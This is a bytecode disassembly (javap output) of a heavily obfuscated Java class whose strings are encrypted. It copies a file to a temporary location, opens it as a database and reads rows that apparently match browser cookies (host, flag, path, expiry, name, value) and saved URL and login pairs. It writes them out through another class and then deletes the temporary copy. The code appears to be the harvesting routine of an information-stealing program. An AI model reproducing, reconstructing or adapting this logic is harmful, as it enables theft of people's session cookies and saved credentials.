       122: invokestatic  #249                // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       125: invokestatic  #256                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       128: invokevirtual #233                // Method java/util/UUID.toString:()Ljava/lang/String;
       131: invokespecial #263                // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       134: astore        11
       136: aload         10
       138: iload         9
       140: ifne          186
       143: aload         11
       145: ldc           #14                 // int 965592690
       147: sipush        -32082
       150: i2c
       151: iadd
       152: ldc           #17                 // int -965592690
       154: sipush        -31037
       157: iadd
       158: lload         5
       160: l2i
       161: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       164: invokestatic  #33                 // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       167: lload         5
       169: lconst_0
       170: lcmp
       171: ifle          182
       174: ifne          184
       177: aload         11
       179: invokevirtual #104                // Method java/io/File.delete:()Z
       182: pop
       183: return
       184: aload         11
       186: invokevirtual #143                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       189: ldc           #14                 // int 965592690
       191: sipush        -32109
       194: i2c
       195: iadd
       196: ldc           #14                 // int 965592690
       198: sipush        15317
       201: iadd
       202: lload         5
       204: l2i
       205: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       208: swap
       209: invokedynamic #358,  0            // InvokeDynamic #4:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       214: invokestatic  #107                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       217: astore        12
       219: aload         12
       221: invokeinterface #291,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       226: astore        13
       228: aload         13
       230: aload_3
       231: invokeinterface #117,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       236: astore        14
       238: new           #110                // class java/lang/StringBuilder
       241: dup
       242: invokespecial #51                 // Method java/lang/StringBuilder."<init>":()V
       245: astore        15
       247: aload         14
       249: invokeinterface #193,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       254: ifeq          826
       257: iload         8
       259: lload         5
       261: lconst_0
       262: lcmp
       263: ifle          838
       266: iload         9
       268: ifne          838
       271: iconst_1
       272: iload         9
       274: lload         5
       276: lconst_0
       277: lcmp
       278: ifle          583
       281: ifne          581
       284: goto          288
       287: athrow
       288: if_icmpne     578
       291: goto          295
       294: athrow
       295: getstatic     #71                 // Field W:I
       298: iconst_1
       299: iadd
       300: putstatic     #71                 // Field W:I
       303: aload         15
       305: aload         14
       307: iconst_1
       308: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       313: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       316: ldc           #2                  // String \t
       318: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       321: aload         14
       323: iconst_1
       324: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       329: iload         9
       331: ifne          380
       334: goto          338
       337: athrow
       338: ldc           #3                  // String .
       340: invokevirtual #393                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       343: lload         5
       345: lconst_0
       346: lcmp
       347: iflt          390
       350: ifeq          383
       353: goto          357
       356: athrow
       357: ldc           #14                 // int 965592690
       359: sipush        -32092
       362: i2c
       363: iadd
       364: ldc           #14                 // int 965592690
       366: sipush        31659
       369: iadd
       370: lload         5
       372: l2i
       373: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       376: goto          380
       379: athrow
       380: goto          402
       383: ldc           #14                 // int 965592690
       385: sipush        -32080
       388: i2c
       389: iadd
       390: ldc           #14                 // int 965592690
       392: sipush        27147
       395: iadd
       396: lload         5
       398: l2i
       399: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       402: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       405: ldc           #2                  // String \t
       407: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       410: aload         14
       412: iconst_2
       413: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       418: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       421: lload         5
       423: lconst_0
       424: lcmp
       425: ifle          438
       428: ldc           #2                  // String \t
       430: iload         9
       432: ifne          484
       435: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       438: aload         14
       440: iconst_3
       441: invokeinterface #69,  2           // InterfaceMethod java/sql/ResultSet.getInt:(I)I
       446: iconst_1
       447: lload         5
       449: lconst_0
       450: lcmp
       451: ifle          500
       454: if_icmpne     487
       457: goto          461
       460: athrow
       461: ldc           #14                 // int 965592690
       463: sipush        -32054
       466: i2c
       467: iadd
       468: ldc           #17                 // int -965592690
       470: sipush        -30164
       473: iadd
       474: lload         5
       476: l2i
       477: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       480: goto          484
       483: athrow
       484: goto          506
       487: ldc           #14                 // int 965592690
       489: sipush        -32100
       492: i2c
       493: iadd
       494: ldc           #17                 // int -965592690
       496: sipush        -15608
       499: iadd
       500: lload         5
       502: l2i
       503: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       506: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       509: ldc           #2                  // String \t
       511: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       514: aload         14
       516: iconst_4
       517: invokeinterface #40,  2           // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       522: invokevirtual #157                // Method java/lang/StringBuilder.append:(J)Ljava/lang/StringBuilder;
       525: ldc           #2                  // String \t
       527: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       530: aload         14
       532: iconst_5
       533: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       538: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       541: ldc           #2                  // String \t
       543: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       546: aload         14
       548: getstatic     #24                 // Field c:J
       551: l2i
       552: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       557: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       560: ldc           #18                 // String \n
       562: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       565: pop
       566: iload         9
       568: lload         5
       570: lconst_0
       571: lcmp
       572: ifle          580
       575: ifeq          247
       578: iload         8
       580: iconst_2
       581: iload         9
       583: lload         5
       585: lconst_0
       586: lcmp
       587: ifle          750
       590: ifne          748
       593: if_icmpne     745
       596: goto          600
       599: athrow
       600: aload         15
       602: ldc           #14                 // int 965592690
       604: sipush        -32057
       607: i2c
       608: iadd
       609: ldc           #17                 // int -965592690
       611: sipush        -26355
       614: i2c
       615: ineg
       616: iadd
       617: lload         5
       619: l2i
       620: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       623: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       626: aload         14
       628: iconst_1
       629: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       634: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       637: ldc           #14                 // int 965592690
       639: sipush        -32052
       642: i2c
       643: iadd
       644: ldc           #17                 // int -965592690
       646: sipush        -26380
       649: i2c
       650: ineg
       651: iadd
       652: lload         5
       654: l2i
       655: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       658: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       661: aload         14
       663: iconst_2
       664: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       669: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       672: ldc           #14                 // int 965592690
       674: sipush        -32053
       677: i2c
       678: iadd
       679: ldc           #14                 // int 965592690
       681: sipush        25959
       684: iadd
       685: lload         5
       687: l2i
       688: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       691: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       694: aload         14
       696: iconst_3
       697: invokeinterface #69,  2           // InterfaceMethod java/sql/ResultSet.getInt:(I)I
       702: invokevirtual #82                 // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
       705: ldc           #14                 // int 965592690
       707: sipush        -32084
       710: i2c
       711: iadd
       712: ldc           #14                 // int 965592690
       714: sipush        -19722
       717: i2c
       718: iadd
       719: lload         5
       721: l2i
       722: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       725: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       728: pop
       729: iload         9
       731: lload         5
       733: lconst_0
       734: lcmp
       735: iflt          254
       738: ifeq          247
       741: goto          745
       744: athrow
       745: iload         8
       747: iconst_3
       748: iload         9
       750: ifne          764
       753: if_icmpne     247
       756: goto          760
       759: athrow
       760: getstatic     #56                 // Field i:I
       763: iconst_1
       764: iadd
       765: putstatic     #56                 // Field i:I
       768: aload         15
       770: aload         14
       772: iconst_1
       773: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       778: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       781: ldc           #14                 // int 965592690
       783: sipush        -32083
       786: i2c
       787: iadd
       788: ldc           #14                 // int 965592690
       790: sipush        -30842
       793: i2c
       794: iadd
       795: lload         5
       797: l2i
       798: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       801: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       804: aload         14
       806: iconst_2
       807: invokeinterface #156,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       812: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       815: ldc           #18                 // String \n
       817: invokevirtual #254                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       820: pop
       821: iload         9
       823: ifeq          247
       826: aload         15
       828: lload         5
       830: lconst_0
       831: lcmp
       832: ifle          820
       835: invokevirtual #351                // Method java/lang/StringBuilder.length:()I
       838: ifle          892
       841: aload         4
       843: aload         7
       845: ldc           #14                 // int 965592690
       847: sipush        -32114
       850: i2c
       851: iadd
       852: ldc           #14                 // int 965592690
       854: sipush        31674
       857: iadd
       858: lload         5
       860: l2i
       861: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       864: dup_x2
       865: pop
       866: ldc           #7                  // String /
       868: swap
       869: invokedynamic #60,  0             // InvokeDynamic #5:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       874: aload         15
       876: invokevirtual #341                // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
       879: getstatic     #342                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
       882: invokevirtual #353                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
       885: invokestatic  #200                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
       888: goto          892
       891: athrow
       892: lload         5
       894: lconst_0
       895: lcmp
       896: ifle          920
       899: aload         14
       901: iload         9
       903: ifne          915
       906: ifnull        968
       909: goto          913
       912: athrow
       913: aload         14
       915: invokeinterface #28,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       920: goto          968
       923: astore        15
       925: lload         5
       927: lconst_0
       928: lcmp
       929: iflt          953
       932: aload         14
       934: iload         9
       936: ifne          948
       939: ifnull        965
       942: goto          946
       945: athrow
       946: aload         14
       948: invokeinterface #28,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       953: goto          965
       956: astore        16
       958: aload         15
       960: aload         16
       962: invokevirtual #112                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       965: aload         15
       967: athrow
       968: lload         5
       970: lconst_0
       971: lcmp
       972: ifle          996
       975: aload         13
       977: iload         9
       979: ifne          991
       982: ifnull        1044
       985: goto          989
       988: athrow
       989: aload         13
       991: invokeinterface #38,  1           // InterfaceMethod java/sql/Statement.close:()V
       996: goto          1044
       999: astore        14
      1001: lload         5
      1003: lconst_0
      1004: lcmp
      1005: ifle          1029
      1008: aload         13
      1010: iload         9
      1012: ifne          1024
      1015: ifnull        1041
      1018: goto          1022
      1021: athrow
      1022: aload         13
      1024: invokeinterface #38,  1           // InterfaceMethod java/sql/Statement.close:()V
      1029: goto          1041
      1032: astore        15
      1034: aload         14
      1036: aload         15
      1038: invokevirtual #112                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1041: aload         14
      1043: athrow
      1044: lload         5
      1046: lconst_0
      1047: lcmp
      1048: ifle          1072
      1051: aload         12
      1053: iload         9
      1055: ifne          1067
      1058: ifnull        1120
      1061: goto          1065
      1064: athrow
      1065: aload         12
      1067: invokeinterface #99,  1           // InterfaceMethod java/sql/Connection.close:()V
      1072: goto          1120
      1075: astore        13
      1077: lload         5
      1079: lconst_0
      1080: lcmp
      1081: iflt          1105
      1084: aload         12
      1086: iload         9
      1088: ifne          1100
      1091: ifnull        1117
      1094: goto          1098
      1097: athrow
      1098: aload         12
      1100: invokeinterface #99,  1           // InterfaceMethod java/sql/Connection.close:()V
      1105: goto          1117
      1108: astore        14
      1110: aload         13
      1112: aload         14
      1114: invokevirtual #112                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1117: aload         13
      1119: athrow
      1120: aload         11
      1122: invokevirtual #104                // Method java/io/File.delete:()Z
      1125: pop
      1126: goto          1151
      1129: astore        12
      1131: aload         11
      1133: invokevirtual #104                // Method java/io/File.delete:()Z
      1136: pop
      1137: goto          1151
      1140: astore        17
      1142: aload         11
      1144: invokevirtual #104                // Method java/io/File.delete:()Z
      1147: pop
      1148: aload         17
      1150: athrow
      1151: return
      Exception table:
         from    to  target type
           838   888   891   Class java/lang/Throwable
           748   756   759   Class java/lang/Throwable
           593   741   744   Class java/lang/Throwable
           581   596   599   Class java/lang/Throwable
           435   480   483   Class java/lang/Throwable
           402   457   460   Class java/lang/Throwable
           338   376   379   Class java/lang/Throwable
           295   353   356   Class java/lang/Throwable
           288   334   337   Class java/lang/Throwable
           271   291   294   Class java/lang/Throwable
           257   284   287   Class java/lang/Throwable
            85    96    96   Class java/lang/Throwable
            78    91    94   Class java/lang/Throwable
           238   892   923   Class java/lang/Throwable
           946   953   956   Class java/lang/Throwable
           925   942   945   Class java/lang/Throwable
           892   909   912   Class java/lang/Throwable
           228   968   999   Class java/lang/Throwable
          1022  1029  1032   Class java/lang/Throwable
          1001  1018  1021   Class java/lang/Throwable
           968   985   988   Class java/lang/Throwable
           219  1044  1075   Class java/lang/Throwable
          1098  1105  1108   Class java/lang/Throwable
           136   177  1129   Class java/lang/Exception
          1077  1094  1097   Class java/lang/Throwable
          1044  1061  1064   Class java/lang/Throwable
           184  1120  1129   Class java/lang/Exception
           136   177  1140   any
           184  1120  1140   any
          1129  1131  1140   any
          1140  1142  1140   any

  static {};
    Code:
         0: ldc2_w        #413                // long 72192309506759l
         3: lstore        7
         5: bipush        54
         7: anewarray     #317                // class java/lang/String
        10: astore        5
        12: iconst_0
        13: istore_3
        14: ldc           #16                 // String ëÔ\u008cè>Z&\u0089µù»}\t\u008c:q@»\"Ùëx\u001chõ~\u008d,Úìzr=@§#öÿ±¦\u000eV\u009c­+\u001bN\u0091\u0016\u0099\t\u009cé\u0011K||I\u0090Ô;~·\u0084V\u0090$ð\u0003g{X(´Ìeyÿ?SÓ\u0082\u0088À7(Ûö([\u0012ÃnÖv\u0006m\u0086\u009dÀ\u001f,\u000bv\u0081\u009d (XSì\u000f\u008cmóÙ_Ô\u0099\u00943ª\u007f¶¸ã}:² \u009d\u008e®¹\u0093o\u0010Ð^w§\u009f\u008b\u0013¦\u0099VE\u0094½T¨w<\u001cT\u000fG\u009dÓ®\u0087²\u009b\n\u008f>\u009e=\u0013\u0019DlV¢\u0007³Üº\u000b\u0014\\1ùÃ\u0092q\u008b\u0017\u009c\u0094*ÃT­G@oFi±\u0003ÙIå&ÛJ±Ü\u001e>Iï\u00102ßA°TMùè\u0006°ûÄÓ\u0089ú\u000b~\t\u001d\u008d²1ÐÂÍD\u008d\u0004D`W\u0016\b\u008eå\u0093\rõ\u008d{\n\u000e\f7µH©Ý\tÏ\u000076$ä®\f\u0083ÁÉWEòð\u001fý¥kì\u0011\u0098Uí<?|Î\u0007\b(ÝkcÁ¢¹(\u0006(².ØÒv\u000e\u009aÍg\u0017ó6B²i\u0098\u001bÑA\u0010\u0006C¯ºYF«\u00025M\u0002EK\u0012\u007f¬Þ\u0099Þx¿&«Ú\u0099f¬O©õ³T\b<vê=5ûkÄ\u000b*¬#ââc¬íøzÖ\u000e\u0092m­Ã\u007f¥\u0096Ì{\u0082îÍù<\u000b:\u0003WÎõ\r\u0082Õv}\u0007\f\u0085e¡`ÔÇ\u009d\u001aÊ\u0082?d\u0012<\u009ee]p\u0094ªRÈÀGH\u008f,Qûù¼\u0012!!Æª\u0004j$\u008d\u0019;C6ê\u0097%{Ñº\u000e*|@äj\u000fÂ\u0018áÑñj\u009eÜ\få÷n^^TU ûK µ\u0011ßÖ\u0005L\"rmÆ|\u0010Sl²!\u0098¥o\u0007C÷\u0016\u0090\b\u00827\u0007ì5ðÿñÐ\u001d\u0012¨r$B\u0081\u0003TIÖ76ÛYø\u0017\u0003d\u008a\u0005aÉºD#\b²þ\u0014n\u0005áe\u0087\b\u0005ê=2Û^#\u008a\u0011)ÚÛÍùB\u0016À\u0013Õ¬g\u001c\u008db\u0015þ\u0012kÔá2\u009cX\u008e¨ìÉ!ß¶j44Gà\u0011\u008d\u0099O¥kODaYáåá5]G\u000fZ\u0002\u008cý\u0012x*>IÂb<eÛ²\u0097kmî\u0091Á´Ò\b\u0093ªï:\u0081_hªA\u000f\u0004ÀojãMY­i\u0004èíÏk¼\u001c\u00062·\u001art@u\u0081§+\u008eæÙ\"Ñÿ\f|¸\u001c\u0015¹=ÐÝ\u008aªÂ\u0099kÃqA»:\u0005yà\u0006\u008eÂMÌ÷y\u000eW\r\u001b;*\u0094\rÎHbÔ×´\u009d¯(\u0091\u001dÁCkxÁ;Ð\u0095\u008a\u0094a¯ß¦~ÃgTB1\u0094\u0085Ô\u0080\u008a¼e\u007f_\u000f¸ñ\u008cbÇ«\u009dd\u0007\n\u0012uì±I\n\u0011$\u0018å\u001f¸¾MOO_\u008f\u008d§ßrõ\f\u0004\u0001_ÿñ\tÀÛnÓ\u0014¤¾Ç¥\bå,Êh\u0085%`Þ\r\u0004¦Ë\u0011¥éXÀÞ=ªÆÃ\fËáÀSdrÔ\u000fy§û¬\f[\u008a\nMEôò\u0006¸vq¨\u0005\u0083\u0096æ¯¨\u000bú:\u008dë ý\u0092[\u0085w\u0084
        16: dup
        17: astore_2
        18: invokevirtual #356                // Method java/lang/String.length:()I
        21: istore        4
        23: bipush        27
        25: istore_1
        26: iconst_m1
        27: istore_0
        28: iinc          0, 1
        31: aload_2
        32: iload_0
        33: dup
        34: iload_1
        35: iadd
        36: invokevirtual #319                // Method java/lang/String.substring:(II)Ljava/lang/String;
        39: iconst_m1
        40: goto          157
        43: aload         5
        45: swap
        46: iload_3
        47: iinc          3, 1
        50: swap
        51: aastore
        52: iload_0
        53: iload_1
        54: iadd
        55: dup
        56: istore_0
        57: iload         4
        59: if_icmpge     71
        62: aload_2
        63: iload_0
        64: invokevirtual #61                 // Method java/lang/String.charAt:(I)C
        67: istore_1
        68: goto          28
        71: ldc           #10                 // String é|ß\u0001\'\u001f@#\u0095îì\u008dú\u0094ÿì,^\u0007\u0018.o\u0018vGÙ
        73: dup
        74: astore_2
        75: invokevirtual #356                // Method java/lang/String.length:()I
        78: istore        4
        80: bipush        18
        82: istore_1
        83: iconst_m1
        84: istore_0
        85: iinc          0, 1
        88: aload_2
        89: iload_0
        90: dup
        91: iload_1
        92: iadd
        93: invokevirtual #319                // Method java/lang/String.substring:(II)Ljava/lang/String;
        96: iconst_0
        97: goto          157
       100: aload         5
       102: swap
       103: iload_3
       104: iinc          3, 1
       107: swap
       108: aastore
       109: iload_0
       110: iload_1
       111: iadd
       112: dup
       113: istore_0
       114: iload         4
       116: if_icmpge     128
       119: aload_2
       120: iload_0
       121: invokevirtual #61                 // Method java/lang/String.charAt:(I)C
       124: istore_1
       125: goto          85
       128: aload         5
       130: putstatic     #155                // Field a:[Ljava/lang/String;
       133: bipush        54
       135: anewarray     #317                // class java/lang/String
       138: putstatic     #222                // Field b:[Ljava/lang/String;
       141: ldc           #13                 // int 1795764622
       143: ldc           #20                 // int -1795767176
       145: lload         7
       147: l2i
       148: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       151: putstatic     #365                // Field r:Ljava/lang/String;
       154: goto          308
       157: swap
       158: invokevirtual #303                // Method java/lang/String.toCharArray:()[C
       161: dup
       162: arraylength
       163: swap
       164: iconst_0
       165: istore        6
       167: swap
       168: dup_x1
       169: iconst_1
       170: if_icmpgt     268
       173: dup
       174: iload         6
       176: dup2
       177: caload
       178: iload         6
       180: bipush        7
       182: irem
       183: tableswitch   { // 0 to 5
                       0: 220
                       1: 225
                       2: 230
                       3: 235
                       4: 240
                       5: 245
                 default: 250
            }
       220: bipush        89
       222: goto          252
       225: bipush        66
       227: goto          252
       230: bipush        127
       232: goto          252
       235: bipush        15
       237: goto          252
       240: bipush        27
       242: goto          252
       245: bipush        86
       247: goto          252
       250: bipush        104
       252: ixor
       253: i2c
       254: castore
       255: iinc          6, 1
       258: swap
       259: dup_x1
       260: ifne          268
       263: dup2
       264: swap
       265: goto          176
       268: swap
       269: dup_x1
       270: iload         6
       272: if_icmpgt     173
       275: new           #317                // class java/lang/String
       278: dup_x1
       279: swap
       280: invokespecial #337                // Method java/lang/String."<init>":([C)V
       283: invokevirtual #380                // Method java/lang/String.intern:()Ljava/lang/String;
       286: swap
       287: pop
       288: swap
       289: tableswitch   { // 0 to 0
                       0: 100
                 default: 43
            }
       308: ldc2_w        #417                // long -7101193728073223487l
       311: iconst_m1
       312: goto          321
       315: putstatic     #24                 // Field c:J
       318: goto          332
       321: dup_x2
       322: pop
       323: lload         7
       325: lxor
       326: dup2_x1
       327: pop2
       328: pop
       329: goto          315
       332: ldc2_w        #407                // long 72192309507351l
       335: iconst_m1
       336: goto          345
       339: putstatic     #94                 // Field d:J
       342: goto          356
       345: dup_x2
       346: pop
       347: lload         7
       349: lxor
       350: dup2_x1
       351: pop2
       352: pop
       353: goto          339
       356: ldc           #6                  // int 1795790070
       358: sipush        25407
       361: isub
       362: ldc           #9                  // int -1795790070
       364: sipush        -7877
       367: isub
       368: lload         7
       370: l2i
       371: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       374: invokestatic  #79                 // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       377: ldc           #6                  // int 1795790070
       379: sipush        25402
       382: isub
       383: ldc           #6                  // int 1795790070
       385: sipush        6014
       388: isub
       389: lload         7
       391: l2i
       392: invokestatic  #185                // Method a:(III)Ljava/lang/String;
       395: invokedynamic #169,  0            // InvokeDynamic #6:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       400: putstatic     #395                // Field A:Ljava/lang/String;
       403: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        -31892
         6: ixor
         7: ldc           #11                 // int 65535
         9: iand
        10: istore_3
        11: getstatic     #222                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #155                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #303                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1078
                       2: 1084
                       3: 1089
                       4: 1094
                       5: 1100
                       6: 1105
                       7: 1111
                       8: 1116
                       9: 1121
                      10: 1126
                      11: 1132
                      12: 1138
                      13: 1144
                      14: 1149
                      15: 1154
                      16: 1158
                      17: 1164
                      18: 1170
                      19: 1176
                      20: 1181
                      21: 1187
                      22: 1192
                      23: 1198
                      24: 1204
                      25: 1210
                      26: 1216
                      27: 1222
                      28: 1228
                      29: 1233
                      30: 1238
                      31: 1244
                      32: 1249
                      33: 1255
                      34: 1260
                      35: 1266
                      36: 1271
                      37: 1276
                      38: 1281
                      39: 1287
                      40: 1293
                      41: 1298
                      42: 1304
                      43: 1310
                      44: 1316
                      45: 1322
                      46: 1328
                      47: 1333
                      48: 1339
                      49: 1344
                      50: 1349
                      51: 1354
                      52: 1360
                      53: 1365
                      54: 1371
                      55: 1377
                      56: 1382
                      57: 1387
                      58: 1393
                      59: 1399
                      60: 1404
                      61: 1409
                      62: 1414
                      63: 1420
                      64: 1426
                      65: 1432
                      66: 1438
                      67: 1443
                      68: 1448
                      69: 1454
                      70: 1459
                      71: 1464
                      72: 1469
                      73: 1475
                      74: 1481
                      75: 1487
                      76: 1493
                      77: 1498
                      78: 1503
                      79: 1509
                      80: 1514
                      81: 1519
                      82: 1525
                      83: 1531
                      84: 1536
                      85: 1541
                      86: 1546
                      87: 1552
                      88: 1557
                      89: 1563
                      90: 1569
                      91: 1574
                      92: 1579
                      93: 1585
                      94: 1590
                      95: 1595
                      96: 1600
                      97: 1605
                      98: 1611
                      99: 1617
                     100: 1622
                     101: 1628
                     102: 1633
                     103: 1637
                     104: 1643
                     105: 1648
                     106: 1654
                     107: 1659
                     108: 1665
                     109: 1671
                     110: 1677
                     111: 1683
                     112: 1689
                     113: 1694
                     114: 1699
                     115: 1704
                     116: 1709
                     117: 1715
                     118: 1720
                     119: 1725
                     120: 1731
                     121: 1737
                     122: 1741
                     123: 1747
                     124: 1752
                     125: 1758
                     126: 1763
                     127: 1769
                     128: 1775
                     129: 1780
                     130: 1786
                     131: 1791
                     132: 1797
                     133: 1803
                     134: 1808
                     135: 1813
                     136: 1819
                     137: 1824
                     138: 1830
                     139: 1836
                     140: 1841
                     141: 1845
                     142: 1850
                     143: 1856
                     144: 1862
                     145: 1867
                     146: 1873
                     147: 1878
                     148: 1884
                     149: 1889
                     150: 1894
                     151: 1900
                     152: 1906
                     153: 1911
                     154: 1916
                     155: 1922
                     156: 1927
                     157: 1933
                     158: 1938
                     159: 1943
                     160: 1948
                     161: 1953
                     162: 1957
                     163: 1963
                     164: 1968
                     165: 1972
                     166: 1977
                     167: 1982
                     168: 1988
                     169: 1993
                     170: 1998
                     171: 2003
                     172: 2008
                     173: 2013
                     174: 2019
                     175: 2025
                     176: 2030
                     177: 2036
                     178: 2042
                     179: 2047
                     180: 2053
                     181: 2058
                     182: 2063
                     183: 2068
                     184: 2074
                     185: 2080
                     186: 2086
                     187: 2092
                     188: 2097
                     189: 2102
                     190: 2107
                     191: 2112
                     192: 2117
                     193: 2123
                     194: 2128
                     195: 2133
                     196: 2138
                     197: 2143
                     198: 2148
                     199: 2154
                     200: 2159
                     201: 2164
                     202: 2169
                     203: 2174
                     204: 2179
                     205: 2185
                     206: 2191
                     207: 2197
                     208: 2202
                     209: 2207
                     210: 2213
                     211: 2218
                     212: 2223
                     213: 2228
                     214: 2234
                     215: 2239
                     216: 2245
                     217: 2250
                     218: 2256
                     219: 2261
                     220: 2267
                     221: 2273
                     222: 2279
                     223: 2284
                     224: 2289
                     225: 2294
                     226: 2299
                     227: 2305
                     228: 2310
                     229: 2316
                     230: 2322
                     231: 2328
                     232: 2334
                     233: 2340
                     234: 2346
                     235: 2352
                     236: 2358
                     237: 2364
                     238: 2370
                     239: 2375
                     240: 2381
                     241: 2387
                     242: 2393
                     243: 2399
                     244: 2405
                     245: 2411
                     246: 2416
                     247: 2422
                     248: 2428
                     249: 2433
                     250: 2439
                     251: 2445
                     252: 2451
                     253: 2456
                     254: 2462
                 default: 2468
            }
      1072: sipush        139
      1075: goto          2471
      1078: sipush        142
      1081: goto          2471
      1084: bipush        62
      1086: goto          2471
      1089: bipush        29
      1091: goto          2471
      1094: sipush        209
      1097: goto          2471
      1100: bipush        34
      1102: goto          2471
      1105: sipush        195
      1108: goto          2471
      1111: bipush        9
      1113: goto          2471
      1116: bipush        85
      1118: goto          2471
      1121: bipush        64
      1123: goto          2471
      1126: sipush        221
      1129: goto          2471
      1132: sipush        225
      1135: goto          2471
      1138: sipush        194
      1141: goto          2471
      1144: bipush        76
      1146: goto          2471
      1149: bipush        66
      1151: goto          2471
      1154: iconst_5
      1155: goto          2471
      1158: sipush        177
      1161: goto          2471
      1164: sipush        249
      1167: goto          2471
      1170: sipush        157
      1173: goto          2471
      1176: bipush        6
      1178: goto          2471
      1181: sipush        216
